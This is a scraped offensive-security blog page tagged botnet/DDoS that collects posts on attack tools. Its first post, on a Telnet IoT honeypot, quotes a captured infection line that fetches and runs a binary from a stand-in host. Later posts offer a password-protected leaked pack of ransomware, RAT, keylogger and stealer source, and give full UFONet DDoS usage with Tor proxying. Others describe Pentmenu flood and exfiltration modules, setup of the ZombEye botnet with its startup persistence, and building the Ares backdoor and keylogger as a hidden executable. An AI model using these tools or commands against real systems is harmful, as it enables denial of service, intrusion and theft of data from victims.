Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label botnet/DDoS. Show all posts
Showing posts with label botnet/DDoS. Show all posts

Sunday, December 31, 2017

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot


This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
Other than https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

Architekure
The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 

Images


Share:

Thursday, July 27, 2017

Collection Package Ramsonware, Malware, BotNet - Pr1v8 Source Code Leaked



Please note, I am not responsible for your actions.

Ransomware is a type of malicious software from cryptovirology that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem – and difficult to trace digital currencies such as Ukash and Bitcoin are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

A remote administration tool (RAT) is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

Stealers the term info stealer is self-explanatory. This type of malware resides in an infected computer and gathers data in order to send it to the attacker. Typical targets are credentials used in online banking services, social media sites, emails, or FTP accounts.



Source: Wikipedia
Password: seginfo

By OffSec 2017






Share:

Sunday, November 6, 2016

Mirai Source Code Released




The IoT Botnet Mirai’s source code has been published online by its author along with configuration and set-up details. Naturally, web security analysts are expecting a series of online attacks from malicious threat actors. The reason behind their concerns is that this code can easily convert any hackable, that is, unsecured or unprotected devices like the routers, web cameras and phone, etc., into DDoS Bots. These bots can then be used to attack websites and to take them offline.





Share:

Monday, September 12, 2016

Open Redirect DDoS Tool - UFONet






UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. UFONet abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.  Remember, this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws.


Developers assume no liability and are not responsible for any misuse or damage caused by this program.


See this links for more info:




Installation:

UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries:
  • python-pycurl – Python bindings to libcurl
  • python-geoip – Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl python-geoip
Source libs:
* Python | * PyCurl | * PyGeoIP

Usage:

  Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose active verbose on requests
--update check for latest stable version
--check-tor check to see if Tor is used properly
--force-yes set 'YES' to all questions
--gui run GUI (UFONet Web Interface)

*Configure Request(s)*:
--proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 10)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)

*Search for 'Zombies'*:
-s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')
--sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt')
--sn=NUM_RESULTS Set max number of results for engine (default 10)
--se=ENGINE Search engine to use for 'dorking' (default: bing)
--sa Search massively using all search engines

*Test Botnet*:
-t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt')
--attack-me Order 'zombies' to attack you (NAT required!)

*Community*:
--download-zombies Download 'zombies' from Community server
--upload-zombies Upload your 'zombies' to Community server
--blackhole Create a 'blackhole' to share your 'zombies'
--up-to=UPIP Upload your 'zombies' to a 'blackhole'
--down-from=DIP Download your 'zombies' from a 'blackhole'

*Research Target*:
-i INSPECT Search biggest file (ex: -i 'http(s)://target.com')

*Configure Attack(s)*:
--no-head Disable check of target's status at start
--disable-isup Disable round check status: 'is target up?'
--disable-aliens Disable 'aliens' web abuse of test services
--disable-droids Disable 'droids' redirectors
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b '/path/big.jpg')
-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')

*Special Attack(s)*:
--db=DBSTRESS Set db stress input point (ex: --db 'search.php?q=')



Examples:

Searching for ‘zombies’:
UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:
'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

For example you can begin a search with:
./ufonet -s 'proxy.php?url='
Or providing a list of “dorks” from a file:
./ufonet --sd 'botnet/dorks.txt'
By default UFONet will uses a search engine called ‘bing’. But you can choose a different one:
./ufonet -s 'proxy.php?url=' --se 'bing'
This is the list of available search engines with last time that were working:
- bing [17/08/2016: OK!]
- yahoo [17/08/2016: OK!]

You can also search massively using all search engines supported:
./ufonet -s 'proxy.php?url=' --sa
To control how many ‘zombies’ receive from search engines you can use:
./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.
Wanna check if they are valid zombies? (Y/n)
Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:
+ with verbose:     ./ufonet -s 'proxy.php?url=' -v
+ with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100



Testing botnet:
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
Urls of the ‘zombies’ should be like this:

http://target.com/check?uri=
After that, launch it:
./ufonet -t 'botnet/zombies.txt'
You can order to ‘zombies’ to attack you and see how they reply to your needs using:
./ufonet --attack-me
At the end of the process you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:
+ with verbose:     ./ufonet -t 'botnet/zombies.txt' -v
+ with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
+ with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50



Inspecting a target:
This feature will provides you the biggest file on target:
./ufonet -i http://target.com
You can use this when attacking to be more effective:
./ufonet -a http://target.com -b "https://cdn-cyberpunk.netdna-ssl.com/biggest_file_on_target.xxx"

Example:
+input:
./ufonet -i http://target.com
+output:
       [...]

+Image found: images/wizard.jpg
(Size: 63798 Bytes)
------------
+Style (.css) found: fonts.css
(Size: 20448 Bytes)
------------
+Webpage (.php) found: contact.php
(Size: 2483 Bytes)
------------
+Webpage (.php) found: about.php
(Size: 1945 Bytes)
------------
+Webpage (.php) found: license.php
(Size: 1996 Bytes)
------------
================================================================================
=Biggest File: http://target.com/images/wizard.jpg
================================================================================
Attacking a target:
Enter a target to attack with a number of rounds:
./ufonet -a http://target.com -r 10
On this example UFONet will attacks the target a number of 10 times for each ‘zombie’. That means that if you have a list of 1.000 ‘zombies’ it will launchs 1.000 ‘zombies’ x 10 rounds = 10.000 requests to the target.
By default if you don’t put any round it will apply only 1.
Additionally, you can choose a place to reload on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems this will do the attack more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:
     + with verbose:     ./ufonet -a http://target.com -r 10 -v
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
+ with threads: ./ufonet -a http://target.com -r 10 --threads 500



Share:

A simple Bash Script for Recon and DOS Attacks - Pentmenu



A bash script inspired by pentbox.
Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

Sudo is implemented where necesssary.
Tested on Debian and Arch.

Requirements:
  • bash
  • sudo
  • curl
  • netcat (must support '-k' option, openbsd variant recommended)
  • hping3 (or nping can be used as a substitute for flood attacks)
  • openssl
  • stunnel
  • nmap
  • whois (not essential but preferred)

How to use?
  • Download the script:
$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu
  • Make it executable:
$ chmod +x ./pentmenu
  • Run it:
$ ./pentmenu
Alternatively, use git clone, or download the latest release from https://github.com/GinjaChris/pentmenu/releases , extract it and run the script.

More detail
RECON MODULES
  • Show IP - uses curl to perform a lookup of your external IP. Runs ip a or ifconfig (as appropriate) to show local interface IP's.
  • DNS Recon - passive recon, performs a DNS lookup (forward or reverse as appropriate for target input) and a whois lookup of the target. If whois is not available it will perform a lookup against ipinfo.io (only works for IP's, not hostnames).
  • Ping Sweep - uses nmap to perform an ICMP echo (ping) against the target host or network.
  • Network Recon - uses nmap to identify live hosts, open ports, attempts OS identification, grabs banners/identifies running software version and attempts OS detection. Nmap will not perform a ping sweep prior as part of this scan. Nmap's default User-Agent string is changed to that of IE11 in this mode, to help avoid detection via HTTP. This scan can take a long time to finish, please be patient.
  • Stealth Scan - TCP Port scanner using nmap to scan for open ports using TCP SYN scan. Nmap will not perform a ping sweep prior to performing the TCP SYN scan. This scan can take a long time to finish, please be patient.
  • UDP scan - uses nmap to scan for open UDP ports.
  • Check Server Uptime - estimates the uptime of the target by querying an open TCP port with hping. Accuracy of the results varies from one machine to another.
DOS MODULES
  • TCP Syn Flood - sends a flood of TCP SYN packets using hping3. If hping3 is not found, it attempts to use the nmap-nping utility instead. Hping3 is preferred since it sends packets as fast as possible. Options are provided to use a source IP of your interface, or specify (spoof) a source IP, or spoof a random source IP for each packet. Optionally, you can add data to the SYN packet. All SYN packets have the fragmentation bit set and use hpings virtual MTU of 16 bytes, guaranteeing fragmentation. Falling back to nmap-nping means sending X number of packets per second until Y number of packets is sent and only allows the use of interface IP or a specified (spoofed) source IP. 
    A TCP SYN flood is unlikely to break a server, but is a good way to test switch/router/firewall infrastructure and state tables. 
  • UDP Flood - much like the TCP SYN Flood but instead sends UDP packets to the specified host:port. Like the TCP SYN Flood function, hping3 is used but if it is not found, it attempts to use nmap-nping instead. All options are the same as TCP SYN Flood, except you can specify data to send in the UDP packets. Again, this is a good way to check switch/router throughput or to test VOIP systems.
  • SSL DOS - uses OpenSSL to attempt to DOS a target host:port. It does this by opening many connections and causing the server to make expensive handshake calculations. This is not a pretty or elegant piece of code, do not expect it to stop immediately upon pressing 'Ctrl c', but it can be brutally effective. 
    The option for client renegotiation is given; if the target server supports client initiated renegotiation, this option should be chosen. Even if the target server does not support client renegotiation (for example CVE-2011-1473), it is still possible to impact/DOS the server with this attack. 
    It is very useful to run this against loadbalancers/proxies/SSL-enabled servers (not just HTTPS!) to see how they cope under the strain. 
  • Slowloris - uses netcat to slowly send HTTP Headers to the target host:port with the intention of starving it of resources. This is effective against many, although not all, HTTP servers, provided the connections can be held open for long enough. Therefore this attack is only effective if the server does not limit the time available to send a complete HTTP request. Some implementations of this attack use clearly identifiable headers which is not the case here. The number of connections to open to the target is configurable. The interval between sending each header line is configurable, with the default being a random value between 5 and 15 seconds. The idea is to send headers slowly, but not so slow that the servers idle timeout closes the connection. The option to use SSL (SSL/TLS) is given, which requires stunnel.
Defences against this attack include (but are not limited to):
Limiting the number of TCP connections per client; this will prevent a single machine from making the server unavailable, but is not effective if say, 10,000 clients launch the attack simultaneously. Additionally, such a defensive measure may negatively impact multiple (legitimate) clients operating behind a forward proxy server.
Limiting the time available to send a complete HTTP request; this is effective since the attack relies on slowly sending headers to the server (the server should await all headers from the client before responding). If the server limits the time for receiving all headers of a request to 10 seconds (for example) it will severely limit the effectiveness of the attack. It is possible that such a measure will prevent legitimate clients over slow/lossy connections from accessing the site.
  • Distraction Scan - this is not really a DOS attack but simply launches multiple TCP SYN scans, using hping, from a spoofed IP of your choosing (such as the IP of your worst enemy). It is designed to be an obvious scan in order to trigger any lDS/IPS the target may have and so hopefully obscure any actual scan or other action that you may be carrying out.
EXTRACTION MODULES
  • File extraction via ICMP - This module uses hping to send data with ICMP packets. It can be extremely useful where only ICMP connectivity is possible.
  • File receipt via ICMP - This module uses hping to listen for ICMP packets and record the data to an output file of your choice. It will only record packet data starting with the secret that you define. Therefore the extractor and receiver must use an identical secret.
An alternative to using this receiver is to run wireshark to capture the inbound icmp packets, which seems quite happy to reconstruct the data received over several fragmented ICMP packets.
  • Listener - uses netcat to open a listener on a configurable TCP or UDP port. This can be useful for testing syslog connectivity, receive files or checking for active scanning on the network. Anything received by the listener is written out to ./pentmenu.listener.out.

Disclaimer
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Also see
Pentmenu is available as a package on Arch Linux. Big love to ArchStrike and Parrot linux .


Share:

Tuesday, January 12, 2016

ZombEye - IRC Botnet




  ZombEye IRC Botnet


  About ZombEye IRC Botnet:

    ZombEye IRC Botnet allows one to use the master control gui to
    run code in a hidden command promt on all of their online bots.

  How to use ZombEye IRC Botnet:

    This botnet consist of three files, "ZombEye Infection.exe",
    "ZombEye Master Control.exe", and "bconfig.ini". You can rename
    the two executable, .exe, files to anything you would like, but 
    the "bconfig.ini" must not be renamed.

    First step is to edit the "bconfig.ini" file in a text editor, 
    such as notepad, and customize the values as you see fit. 

    These include the IRC server, port, channel and username for master 
    control. The "bconfig.ini" file is used by both exe files.  
   
    You need to place the "bconfig.ini" file in the root of the C:\ drive 
  on your bot computers. Next you would place "ZombEye Infection.exe
    in the Start Menus "Startup" folder and run it.

    Before opening "ZombEye Master Control.exe" to control your bot(s)
    you must have the "bconfig.ini" file in your root of the C:\ drive 
    with server settings matching the bots.





Share:

Wednesday, January 6, 2016

Ares - Python Botnet and Backdoor




Ares is made of two main programs:
  • A Command aNd Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
The Web interface can be run on any server running Python. You need to install the cherrypy package.
The client is a Python program meant to be compiled as a win32 executable using pyinstaller. It depends on the requests, pythoncom, pyhook python modules and on PIL (Python Imaging Library).

It currently supports:
  • remote cmd.exe shell
  • persistence
  • file upload/download
  • screenshot
  • key logging

Installation

Server

To install the server, first create the sqlite database:
cd server/
python db_init.py
If no installed, install the cherrypy python package.
Then launch the server by issuing: python server.py
By default, the server listens on http://localhost:8080

Agent

The agent can be launched as a python script, but it is ultimately meant to be compiled as a win32 executable using pyinstaller.

First, install all the dependencies:
  • requests
  • pythoncom
  • pyhook
  • PIL
Then, configure agent/settings.py according to your needs:
SERVER_URL = URL of the CNC http server
BOT_ID = the (unique) name of the bot, leave empty to use hostname
DEBUG = should debug messages be printed to stdout ?
IDLE_TIME = time of inactivity before going in idle mode (the agent checks the CNC for commands far less often when idle).
REQUEST_INTERVAL = interval between each query to the CNC when active
Finally, use pyinstaller to compile the agent into a single exe file:
cd client/
pyinstaller --onefile --noconsole agent.py


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition